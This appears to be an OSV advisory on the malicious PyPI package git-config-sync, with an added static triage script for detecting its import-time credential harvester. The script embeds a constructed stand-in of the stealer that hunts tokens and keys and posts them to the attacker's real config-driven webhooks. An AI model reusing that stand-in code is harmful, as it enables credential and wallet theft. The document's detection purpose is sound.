{"id":"MAL-2026-4273","summary":"Malicious code in git-config-sync (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8e49db03099f1d6053a9ebada346c3816399bc47918c92d765162128a095c401)\nOn `import gitconfig_sync`, the package's `_core.py` spawns a daemon thread (after a 3-15 second random delay) that walks `~/.ssh`, `~/.aws`, `~/.ethereum`, `~/.config`, `~/.docker`, `~/.kube`, and the current working directory, regex-matching private keys, BIP39 mnemonics, OpenAI `sk-` keys, GitHub `ghp_` tokens, AWS `AKIA` keys, and passwords. Harvested findings (up to 200) are bundled with the host's hostname, platform, and CWD into a JSON payload and POSTed to webhook endpoints fetched dynamically from `https://ddjidd564.github.io/defi-security-best-practices/config.json` with TLS verification explicitly disabled (`ctx.check_hostname = False; ctx.verify_mode = ssl.CERT_NONE`). The remote config-driven webhook list lets the operator rotate exfil destinations without republishing. The package presents a benign cover (`sync.py`/`cli.py` claiming git-config-sync functionality, generic 'DevOps Tools' author metadata, README that never mentions `_scan_and_report`) to mask the harvester. The `defi-security-best-practices` path on the C2 domain plus the `.ethereum` scan and BIP39 mnemonic regex indicate crypto-wallet targeting.\n\n## Source: kam193 (f1b5dafc5b04761cd45c3c22cb68a171eaf1cf6431189c8fecb1249c3443e042)\nDuring import, the package runs code that exfiltrates credentials, private keys and other sensitive data.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-05-eth-security-auditor\n\n\nReasons (based on the campaign):\n\n\n - files-exfiltration\n\n\n - exfiltration-env-variables\n\n\n - crypto-related\n\n\n - Downloads and executes a remote malicious script.\n\n\n - exfiltration-crypto\n\n\n - exfiltration-credentials\n","modified":"2026-05-26T06:03:10.525496699Z","published":"2026-05-24T01:45:48Z","database_specific":{"iocs":{"domains":["ddjidd564.github.io"],"urls":["https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js","https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js","https://ddjidd564.github.io/defi-security-best-practices/config.json"]},"malicious-packages-origins":[{"versions":["0.1.0","0.1.1"],"import_time":"2026-05-24T06:19:57.541247445Z","source":"kam193","modified_time":"2026-05-24T05:33:38.11056Z","sha256":"f1b5dafc5b04761cd45c3c22cb68a171eaf1cf6431189c8fecb1249c3443e042","id":"pypi/2026-05-eth-security-auditor/git-config-sync"},{"modified_time":"2026-05-24T01:45:48Z","import_time":"2026-05-26T05:52:34.429664085Z","source":"amazon-inspector","versions":["0.1.0"],"sha256":"5d71ccb34f946bbc8f9f6a517eefc23e987ad2a9c2bfe335f58d6b0047d31685","id":"IN-MAL-2026-004424"},{"modified_time":"2026-05-24T01:45:57Z","import_time":"2026-05-26T05:52:34.923800582Z","source":"amazon-inspector","versions":["0.1.1"],"sha256":"8e49db03099f1d6053a9ebada346c3816399bc47918c92d765162128a095c401","id":"IN-MAL-2026-004428"}]},"references":[{"type":"WEB","url":"https://github.com/ddjidd564"},{"type":"WEB","url":"https://github.com/ddjidd564/defi-security-best-practices/tree/gh-pages"},{"type":"WEB","url":"https://ddjidd564.github.io/defi-security-best-practices/wallet-verify.py"},{"type":"WEB","url":"https://github.com/orgs/modelcontextprotocol/discussions/761"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/git-config-sync"},{"type":"PACKAGE","url":"https://pypi.org/project/git-config-sync/0.1.0/"},{"type":"PACKAGE","url":"https://pypi.org/project/git-config-sync/0.1.1/"}],"affected":[{"package":{"name":"git-config-sync","ecosystem":"PyPI","purl":"pkg:pypi/git-config-sync"},"versions":["0.1.0","0.1.1"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"b56186e2193a4b51d257dd5f898291a4331abd2b5c03ac74f86d9a34afdc61512f01ac","path":"gitconfig_sync/_core.py","sha256":"33a37a3886282e291e31865f1e503fcf5892c418431ddc8c9be497493ee87a1b"},{"tlsh":"5cc08c2b26aa6e63027a6dd3d009a094af390b822f0c2009897e3224c2a84835e86c00","path":"gitconfig_sync/__init__.py","sha256":"c6aeace551e8f390301fde3c46c98d44d4a2e57f3662910e2e9bb8529989362d"}],"package_integrity":[{"hashes":{"blake2b_256":"0b32748f6f0c66c4ad4ed81e485a2fa795898d99001b2244f3d90d6e8f985eea","md5":"828c94edafd1813c9e973c1b65cac5d4","sha256":"d0a7f92f4648221e5dba043898ca58d9d3c38ca5b5a080a9d00ddec459d16ea1"},"filename":"git_config_sync-0.1.0-py3-none-any.whl"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/git-config-sync/MAL-2026-4273.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}
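The amazon-inspector description in this record names a concrete, statically visible set of indicators (an `ssl` context with `check_hostname = False` and `verify_mode = ssl.CERT_NONE`, a daemon thread started at import time after a random delay, regexes for `AKIA`/`ghp_`/`sk-`/private-key material, a walk over `~/.ssh`, `~/.aws`, `~/.ethereum` and friends, and the `ddjidd564.github.io` config URL). The following Python triage script is an added example written for this page, not code from the package, from the reporters, or from the OSV record; it parses sources with `ast` and never imports them, so it is safe to point at a quarantined `site-packages/gitconfig_sync` directory. The function names (`scan_source`, `triage`, `scan_tree`) are mine, the two embedded sample sources are constructed stand-ins that only mimic the described behaviour, and it assumes Python 3.9+ for `ast.unparse`.

```python
"""Static triage for the import-time credential-harvester pattern in this advisory.

Parses Python sources with ast (never executes them) and flags: TLS verification
switched off on an ssl context, a daemon thread spawned (module scope == runs on
import), a random pre-start sleep, well-known token prefixes inside string/regex
literals, sensitive home directories, and the advisory's IOC domain.
"""
import ast
import pathlib

IOC_DOMAINS = {"ddjidd564.github.io"}                      # from the IOC list in the record
SENSITIVE_DIRS = {".ssh", ".aws", ".ethereum", ".config", ".docker", ".kube"}
TOKEN_MARKERS = ("AKIA", "ghp_", "sk-", "PRIVATE KEY")     # prefixes the advisory names


class _Indicators(ast.NodeVisitor):
    def __init__(self):
        self.findings = []   # (lineno, tag, detail)
        self.depth = 0       # 0 == module scope, i.e. executed on import

    def _add(self, node, tag, detail):
        self.findings.append((node.lineno, tag, detail))

    def visit_FunctionDef(self, node):
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    visit_AsyncFunctionDef = visit_ClassDef = visit_FunctionDef

    def visit_Assign(self, node):
        for target in node.targets:
            if not isinstance(target, ast.Attribute):
                continue
            value = ast.unparse(node.value)
            if target.attr == "check_hostname" and value == "False":
                self._add(node, "tls-verify-off", "check_hostname = False")
            elif target.attr == "verify_mode" and value.endswith("CERT_NONE"):
                self._add(node, "tls-verify-off", "verify_mode = CERT_NONE")
        self.generic_visit(node)

    def visit_Call(self, node):
        func = ast.unparse(node.func)
        if func.endswith("Thread") and any(
                k.arg == "daemon" and ast.unparse(k.value) == "True" for k in node.keywords):
            where = "module scope" if self.depth == 0 else "function body"
            self._add(node, "daemon-thread", f"Thread(daemon=True) in {where}")
        if func.endswith("sleep") and node.args and "random" in ast.unparse(node.args[0]):
            self._add(node, "random-delay", ast.unparse(node))
        self.generic_visit(node)

    def visit_Constant(self, node):
        if not isinstance(node.value, str):
            return
        s = node.value
        for dom in IOC_DOMAINS:
            if dom in s:
                self._add(node, "ioc-domain", dom)
        for marker in TOKEN_MARKERS:
            if marker in s:
                self._add(node, "token-regex", marker)
        for part in s.replace("\\", "/").split("/"):   # match whole path segments only
            if part in SENSITIVE_DIRS:
                self._add(node, "sensitive-dir", part)


def scan_source(src, path="<string>"):
    """Return indicator findings for one Python source text (static only)."""
    try:
        tree = ast.parse(src, filename=path)
    except SyntaxError as exc:
        return [(exc.lineno or 0, "parse-error", str(exc))]
    visitor = _Indicators()
    visitor.visit(tree)
    return visitor.findings


def triage(findings):
    """Collapse findings into a verdict; TLS-off plus secret hunting is decisive."""
    tags = {tag for _, tag, _ in findings}
    if "ioc-domain" in tags:
        return "malicious-pattern"
    if "tls-verify-off" in tags and tags & {"token-regex", "sensitive-dir"}:
        return "malicious-pattern"
    return "review" if tags else "clean"


def scan_tree(root):
    """Scan every .py file under root, e.g. a quarantined site-packages/gitconfig_sync."""
    return {str(p): scan_source(p.read_text(encoding="utf-8", errors="replace"), str(p))
            for p in sorted(pathlib.Path(root).rglob("*.py"))}


# Constructed stand-in mirroring the behaviour the advisory describes; NOT the package's code.
SUSPECT_SRC = r'''
import json, os, random, re, ssl, threading, time, urllib.request
PATTERNS = [re.compile(r"AKIA[0-9A-Z]{16}"), re.compile(r"ghp_[A-Za-z0-9]{36}"),
            re.compile(r"sk-[A-Za-z0-9]{20,}"), re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")]
TARGETS = [os.path.expanduser("~/" + d) for d in (".ssh", ".aws", ".ethereum", ".kube")]
CONFIG_URL = "https://ddjidd564.github.io/defi-security-best-practices/config.json"
def _report(payload):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    for hook in json.load(urllib.request.urlopen(CONFIG_URL, context=ctx)):
        urllib.request.urlopen(hook, data=json.dumps(payload).encode(), context=ctx)
def _scan():
    time.sleep(random.uniform(3, 15))
    _report({"host": os.uname().nodename})
threading.Thread(target=_scan, daemon=True).start()
'''

# Constructed benign module that does what the cover story claims (reads a git config).
BENIGN_SRC = '''
import configparser, pathlib
def load_user(path=pathlib.Path("~/.gitconfig").expanduser()):
    cp = configparser.ConfigParser()
    cp.read(path)
    return dict(cp["user"]) if "user" in cp else {}
'''

if __name__ == "__main__":
    import sys
    for path, findings in scan_tree(sys.argv[1]).items():
        print(f"{triage(findings):18} {path}")
        for line, tag, detail in findings:
            print(f"    line {line}: {tag}: {detail}")
```

Run it as `python triage.py /path/to/site-packages/gitconfig_sync` after `pip download` or on a quarantined environment, never after importing the package. The `ioc-domain` rule is specific to this campaign; the combination of `tls-verify-off` with `token-regex` or `sensitive-dir` is the part that generalises to other import-time stealers, while a lone `.config` or `sk-` hit is only a "review" signal because legitimate code uses both.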